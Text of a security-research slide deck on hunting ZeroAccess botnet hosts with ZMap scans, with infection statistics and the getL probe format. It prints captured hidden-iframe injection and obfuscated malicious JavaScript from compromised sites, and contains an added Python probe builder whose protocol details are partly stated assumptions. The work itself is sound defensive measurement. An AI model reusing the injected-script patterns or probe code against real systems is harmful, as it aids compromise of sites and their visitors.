© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Hunting Botnets with ZMap
Ricky Lawshae / 21 March 2014
Who am I?
• Security Researcher at HP TippingPoint DVLabs
• At Rapid7 before that, and BreakingPoint before that…been doing this for a while now
• Specialize in network protocol analysis
• Breaker of things/voider of warranties
What is the internet?
The State of Scanning
• Internet Census 2012
– Researcher compromised more than 400k devices
– Created the Carna Botnet
– Started sending various probes to every machine on the internet
– Published the scan data
• Critical.io
– Same idea of scanning the whole internet
– Instead of having a 400k botnet, it was just HD Moore doing it himself
– Data was not public at the time
The State of Scanning
• Do-it-yourself
– Growing number of internet-scale scanning tools (ZMap, Masscan, etc)
– Arms race of sorts to see who can scan /0 the fastest
• “Scan the entire internet in X minutes!”
• ZMap
– Created by a team at University of Michigan
– Open-source (https://github.com/zmap/zmap)
– Easy to use
• zmap -M udp -p [port] -B 400M --probe-args=file:[payload_file]
The State of Scanning
• Project Sonar
– Started by Rapid7 in 2013
– Community-driven scan data collection
– Utilizes many different scan methods
– Publicly available (https://scans.io/)
The State of Scanning
• Get a better idea of what the internet is
• Take a proactive approach to difficult problems
– Such as…
Malware
• Largely unquantified problem
– At least, not efficiently or accurately
– Assume it’s bad, we just don’t know exactly how bad
• The current approach
– Passive monitoring of “sensors”
– Hits on IDS devices, etc
– Extrapolate infection numbers from sample sets
• A new approach
– Use internet scanning (i.e. ZMap) to look for compromised/malicious hosts
– They tell you right then if they’re infected or not
Using the Data We Have
• Searching through existing scan data shows a lot of awful out there
– Exploit kit landing pages
– Malicious javascript
– Shells!
Using the Data We Have
[110.137.80.152]
HTTP/1.1 200 OK
Date: Fri, 14 Dec 2012 09:07:26 GMT
Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.8 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Accept-Ranges: bytes
Content-Length: 312
Connection: close
Content-Type: text/html
<html>
<head>
<meta name="author" content="Kai Oswald Seidler">
<meta http-equiv="refresh" content="0;url=/xampp/">
</head>
<body bgcolor=#ffffff><!--5b1825--><iframe frameborder=0 height=1 width=1 scrolling=no src='http://gabranits.com/main.php?page=85deef298b2e1e90'> </iframe><!--/5b1825-->
</body>
</html>
Using the Data We Have
[108.60.3.182]
HTTP/1.1 200 OK
Date: Sat, 15 Dec 2012 20:20:49 GMT
Server: Apache
Last-Modified: Sat, 15 Dec 2012 07:43:52 GMT
Accept-Ranges: bytes
Content-Length: 2685
Connection: close
Content-Type: text/html
<html><body bgcolor="#000000"><!--393740--><script type="text/javascript" language="javascript" >
try{bgewg346tr++}catch(aszx){try{dsgdsg-142}catch(dsfsd){try{window.document.body++}catch(gdsgsdg){dbshre=82;}}}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}asgq=new
Using the Data We Have
[83.141.18.221]
(root@web21:/)\n/bin/sh: line 1: GET: command not found\n/bin/sh: line 2: r: command not found\n
Using the Data We Have
• Good to know, but we want to go deeper
• Sending generic requests won’t work for everything
– UDP services only respond to requests they recognize
– Targeted malware scanning would get better results faster
• Time to do our own scan!
Scanning for Botnets
• A step-by-step guide
– Write a ZMap probe that elicits a response from infected hosts and/or C&C servers
– Find some bandwidth
• Dedicated servers with fat, unmetered pipes work nicely
• My current setup has a 500Mbps unlimited line and a TB of storage
– Send your probe to the entire internet
– Examine the responses
• Remove any false positives you got back
• You can automate most of this if you know what you’re looking for
– Respond to abuse complaints
Scanning for Botnets
• What makes a good target
– UDP is easier than TCP
• Less overhead
• Less risk of false positive (well…we’ll get to that)
– Small range of listening ports
• Zeus picks randomly from a 10000 port range…It adds up quick
• What doesn’t make a good target
– Malware that communicates over HTTP
• Lots of results == lots of post-processing
• ZMap doesn’t handle this well
Proof of Concept
Proof of Concept: Zero Access
• Botnet used mostly for click-fraud, some bitcoin mining
• Been in the news a lot lately
– Microsoft take-down attempt on Dec 5th
– And Symantec last Sept
• P2P botnet where all infected hosts can talk to each other
– “Super peers” are internet-facing machines
– Hard to track down actual C&C servers, since control is decentralized
– Hard to completely shut down
Proof of Concept: Zero Access
• It makes a good proof of concept for many reasons
– Bot communication over both TCP and UDP
– Small command payloads
• 16 bytes for the one I used
– Small range of hardcoded ports
• 16461, 16464, 16465, 16470, 16471
– Known to be currently active
• Bound to get at least some results
Proof of Concept: Zero Access
• GetL command
– Get list of peers that an infected host is able to communicate with
– 16 byte payload
• 4 byte CRC checksum
• 4 byte command string (“getL”)
• 4 byte unknown (Sequence number or packet ID? Anyways, it’s 0)
• 4 byte unique ID
– Gets “encrypted” using a ROL/XOR algorithm
• 4 byte key ^ 1st 4 bytes of data
• Rotate key bits left one place, and XOR rotated key with next 4 data bytes
• Repeat
– Hardcoded key == “ftp2”
Proof of Concept: Zero Access
\xE7\x98\xED\x03\x28\x94\x8D\xAB
\xC9\xC0\xD1\x99\x13\xC3\xC6\xF9
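The getL probe build, the ROL/XOR transform, and the reply triage behind the "Remove any false positives" step, as an added Python example (not the presenter's code). Assumed rather than stated on the slides: little-endian DWORDs, a CRC32 that covers the 12 bytes after it, and replies that use the same transform and carry a "retL" command name.

```python
# Added example (not the presenter's code): build the ZeroAccess "getL" probe
# described on the slides and triage scan replies so HTTP filter pages and
# other non-bot traffic are dropped as false positives.
# Assumptions not stated on the slides: DWORDs are little-endian, the leading
# CRC32 covers the 12 bytes after it, and replies use the same ROL/XOR
# transform and carry a "retL" command name.
import struct
import zlib

KEY = b"ftp2"        # hardcoded key from the slide
CMD_GETL = b"getL"   # peer-list request
CMD_RETL = b"retL"   # peer-list reply (assumed name)


def rol32(value: int, bits: int = 1) -> int:
    """Rotate a 32-bit value left by `bits`."""
    bits %= 32
    return ((value << bits) | (value >> (32 - bits))) & 0xFFFFFFFF


def rolxor(data: bytes, key: bytes = KEY) -> bytes:
    """The slide's ROL/XOR scheme: XOR each DWORD with the key, then rotate the
    key left one bit before the next DWORD. XOR is its own inverse and the key
    schedule is fixed, so one routine both encrypts probes and decrypts replies."""
    if len(data) % 4:
        raise ValueError("payload length must be a multiple of 4")
    (k,) = struct.unpack("<I", key)
    out = bytearray()
    for off in range(0, len(data), 4):
        (dword,) = struct.unpack_from("<I", data, off)
        out += struct.pack("<I", dword ^ k)
        k = rol32(k)
    return bytes(out)


def build_message(cmd: bytes, unknown: int, unique_id: int) -> bytes:
    """Plaintext layout from the slide: crc | 4-byte command | unknown | unique id."""
    body = cmd + struct.pack("<II", unknown, unique_id)
    crc = zlib.crc32(body) & 0xFFFFFFFF   # assumed to cover the bytes after it
    return struct.pack("<I", crc) + body


def build_getl_probe(unique_id: int) -> bytes:
    """16 encrypted bytes suitable for zmap --probe-args=file:<payload_file>."""
    return rolxor(build_message(CMD_GETL, 0, unique_id))


def classify_reply(raw: bytes) -> str:
    """Triage one UDP reply: 'http' for filter/captive pages such as the Rimon
    block page, 'zeroaccess:<cmd>' when the decrypted CRC verifies, else 'unknown'."""
    if raw.startswith(b"HTTP/"):
        return "http"
    if len(raw) < 16:
        return "unknown"
    plain = rolxor(raw[: len(raw) - len(raw) % 4])
    crc, cmd = struct.unpack_from("<I4s", plain)
    if zlib.crc32(plain[4:]) & 0xFFFFFFFF != crc:
        return "unknown"
    return "zeroaccess:" + cmd.decode("ascii", "replace")


# Constructed sample replies: an encrypted retL message a super-peer might send
# back, and the header portion of the Rimon filter response shown on the slide.
SAMPLE_RETL = rolxor(build_message(CMD_RETL, 0, 0x1234ABCD))
SAMPLE_RIMON = (b"HTTP/1.0 200 OK\r\nConnection: keep-alive\r\nRimon: RWC_BLOCK\r\n"
                b"Content-type: text/html\r\n\r\n")


def triage(replies):
    """Count replies by class; only the zeroaccess:* bucket is a real infection."""
    counts = {}
    for r in replies:
        label = classify_reply(r)
        counts[label] = counts.get(label, 0) + 1
    return counts


if __name__ == "__main__":
    print(build_getl_probe(0xDEADBEEF).hex())
    print(triage([SAMPLE_RETL, SAMPLE_RIMON, b"\x00" * 20]))
```

The CRC check is what separates a real peer reply from the Rimon-style HTTP pages that inflated the Israeli count before filtering.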
Sweet, sweet data
Infection by the Numbers
• Scan date: 4 December 2013
• Scan duration: 15 hours
• Total unique hosts found: 10500
• Infected hosts (by port)
– 16461: 239
– 16464: 3503
– 16465: 1285
– 16470: 2192
– 16471: 4230
• Scan date: 24 January 2014
• Scan duration: 15 hours
• Total unique hosts found: 7873
• Infected hosts (by port)
– 16461: 176
– 16464: 3732
– 16465: 1238
– 16470: 1798
– 16471: 2713
Second Scan by Country
• Infection found across 109 countries
• US accounts for 34% of infected hosts
– Seems like a lot until you realize that US owns 34% of all IPv4 addresses[1]
• Japan is distant 2nd at 9%
• Switzerland has 5 (~0.065%)
• Venezuela seems a little high…
[1] http://www.ip2location.com/reports/internet-ip-address-2012-report
A quick aside to discuss a couple of anomalies
Where is China?
• 56th place in the list of infected countries
– 11 infected hosts
– 0.1% of total
• Consensus is that this is probably Great Firewall of China related
• If we count Hong Kong as part of China, the number goes up quite a bit
– Hong Kong had 54 infected (about 5 times more than all of China)
– Bumps China up to almost 1%!
The Curious Case of Israel
• Before removing false positives, Israel showed WAY higher than expected infected hosts
– 3372 “infected” in first scan (23% of total). Was it being targeted?
– Only 80 of those were legitimate results
• Examining the false positives among the Israeli IP addresses showed most were HTTP responses
• Turns out http://internet-rimon.com/ (major Israeli ISP) does some intense nanny filtering
HTTP/1.0 200 OK
Connection: keep-alive
Rimon: RWC_BLOCK
Content-type: text/html
Refresh: 15
Date: Wed, 04 Dec 2013 06:31:28 GMT
Expire: Mon, 02 Dec 2013 21:11:28
Pragma: no-cache
Cache-Control: no-cache
Server: lighttpd/1.4.19
Content-Length: 103
<html><head></head><body><center><b>You are not recognized in the system !!!</b></center></body></html>
Back to the Data
Trouble in South America?
Everywhere else is getting better, but S. America seems to be getting much worse (CL +21, AR +61, VE +80, etc). Politics? Impending World Cup? Impossible to guess. May even be coincidence.
Second Scan by ISP
• No big surprises here
– Most ISPs in the top 10 are based in countries in the top 10
– Though the order is somewhat interesting
• Should be noted that Microsoft still has 16 infected hosts out there…
– Funny in light of the fact that they were going so hard against Zero Access recently
• Couple from Amazon, godaddy, etc
[Chart: Top 10 infected ISPs, in chart order: Comcast Cable, Time Warner, Charter Comm, RCS & RDS, Chunghwa, CanTV, Cox Comm, Optimum Online, Open Comp Net, Telecom Italia; host counts shown: 725, 470, 254, 228, 205, 196, 172, 140, 130, 91]
The Takeaway
What We Learned
• It works!
– Well…for specific types of malware
– Stronger and weaker than old approach in certain aspects
– Only get part of the picture
– Feasibility of HTTP-based C&C hunting has yet to be determined
• Zero Access is still rampant
– Dumb guess at number of peers based only on super-peers means as much as 2 million infected
– Reality is probably lower, could decode responses to find out…
• China and Israel both have pretty good firewalls apparently
Where do we go next?
• Decode responses I got from this scan to pull out peer lists
– Get a more complete picture of the infection
– Though just knowing all the super-peers is still very useful
• Going after C&C
– Currently assessing potential targets
– Would like to avoid having to process HTTP responses
• Get a regularly scheduled cycle of scans going
– More probes!
– Could have monthly or even weekly updates on multiple botnets
What else could you do with this?
• Track infection rates over time
– More data points == better conclusions
– See if it’s getting better or worse
– Watch the distribution to other countries
• Watch take-down attempts as they happen
– Measure effectiveness
• Scan your own internal networks
– Can scan an entire class A in minutes
– You should already be scanning your own networks anyway
References
https://zmap.io/ [ZMap open-source scanner project]
http://en.wikipedia.org/wiki/ZeroAccess_botnet [Zero Access entry on Wikipedia]
https://twitter.com/HeadlessZeke [I rarely say anything valuable, but I am responsive]
headlesszeke@hp.com
Thank you
